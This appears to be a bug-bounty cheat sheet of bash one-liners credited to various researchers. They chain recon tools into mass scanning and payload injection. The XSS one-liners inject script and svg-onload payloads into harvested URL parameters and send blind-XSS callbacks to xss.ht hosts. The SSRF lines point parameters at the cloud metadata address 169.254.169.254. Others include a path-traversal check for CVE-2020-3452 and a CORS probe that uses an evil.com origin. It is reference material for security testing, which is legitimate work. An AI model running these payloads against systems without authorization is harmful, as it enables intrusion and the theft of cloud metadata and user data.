For loops and one liners for bug bounty
Credits goes to all those awesome researchers who uploaded these on Twitter and GitHub
Please Note: Kindly use this only for reference and learning purposes using this doesn't means that you will find Vulnerabilities cause everybody is using this so try to be creative while using it and modify them to get unique results :)
One Liners for XSS
Using DALFOX to send the result for xss
cat target_list| gau | egrep -o "http?.*" | grep "="| egrep -v ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | dalfox pipe -blind https://yours.xss.ht -o result.txtXSS without GF Patterns
waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
Using Gospider with Dalfox to find XSS
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o output.txtScan subdomains from Bounty Targets data Using DalFox for XSS
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; | subfinder -dL domains.txt | httpx -silent -threads 500 | tee -a subdomains.txt | dalfox file subdomains.txt -b your.xss.ht pipe
Using Kxss for finding xss
cat http://subdomains.txt | waybackurls | kxssUsing Gospider with qsreplace
gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg/onload=confirm(1);>'For Finding Subdomains AssetDiscovery
For making a huge wordlist of subdomains with Rapid 7 FDNS @m4ll0k
Download the zip file from here
gzip -dc latestfile-fdns_a.json.gz | jq .name | sed 's/"//g' | xargs -I @bash -c 'tldextract @' | awk '{print $1}' >> mysubs.txt One liner to fetch all URLs in scope of all public programs @ayoubfathi
curl -s https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/hackerone_data.json | jq -r '.[].targets.in_scope[] | select(.asset_type|contains("URL")) | .asset_identifier' |grep -v "*" | sortFinding Subdomains from crt.sh @vict0ni
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -uFrom Bounty Targets Data @dwisiswant0
For Hackerone
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
For Bugcrowd
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
For Intigriti
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
For Finding ASN's of a ORG using amass @KingOFBugBounty
amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500''
While Loop For Subfinder To Discovery new Subdoamins it will run Every 2 hours
while true; do subfinder -dL domains.txt -all | anew subdomains1.txt | httpx | notify ; sleep 7200; doneNote: Before running the above command make sure you do the below first:
Run subfinder -dL domains.txt -all >> subdomains1.txt
Install nuclei, subfinder, Notify and anew
Brute Force List of subdomains using FFuf
for url in ` cat $filename `; do ffuf -c -w path.txt -u $url/FUZZ -o result.json ; done >> result.txtFor finding Hidden Servers and Admin Panles @rez0
ffuf -c -u https://target .com -H "Host: FUZZ" -w vhost_wordlist.txt
One liners for SSRF
Using waybackurls and gau @R0X4R
After finding subdomains with HTTPX run the Following
cat subdomains.txt | gauplus --random-agent -b png,jpg,svg,gif -t 100 | anew -q gau_output.txt
cat subdomains.txt | xargs -P 30 -I host bash -c "echo host | waybackurls | anew -q wayback_output.txt"
cat wayback_output.txt gau_output.txt | urldedupe -s | anew -q parameters.txt
Mannual
cat parameters.txt | qsreplace "http://169.254.169.254/latest/meta-data/hostname" | xargs -I host -P 50 bash -c "curl -ks 'host' | grep \"compute.internal\" && echo -e \"[VULNERABLE] - X \n \"" | grep "VULN"
Using OOB
cat parameters.txt | gf ssrf | anew -q ssrf.txt
cat ssrf.txt | qsreplace "interactsh server ID" | anew -q ssrf_test.txt
ffuf -w ssrf_test.txt -u FUZZ -p "0.6-1.2" -H "(header in thread)" -t 200 -s
Using nuclei and Gf for microstrategy SSRF @Virdoex_hunter
subfdiner -dL domains.txt | httpx | gau | gf ssrf | nuclei -t ~/nuclei-templates/vulnerabilities/other/microstrategy-ssrf.yaml -o result.txt
One Liners for Recon and Visual inspection
Using Assetfinder with gowitness
assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' Find Subdomains using Subfinder and opens them on Firefox @payloadartists
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
One Liners for information disclosure
Using WaybackURL to find Excel File leads to PII Disclosure @M0_SADAT
gau http://hacked-site.com | waybackurls | grep ".xlsx"
One Liners for CVE and and other Vulnerabilties
To find CVE 2020-3452
while read domains.txt; do curl -s -k "https://$domains/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txtCORS Missconfiguration @@ManasH4rsh
site="https://example.com"; gau "$site" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done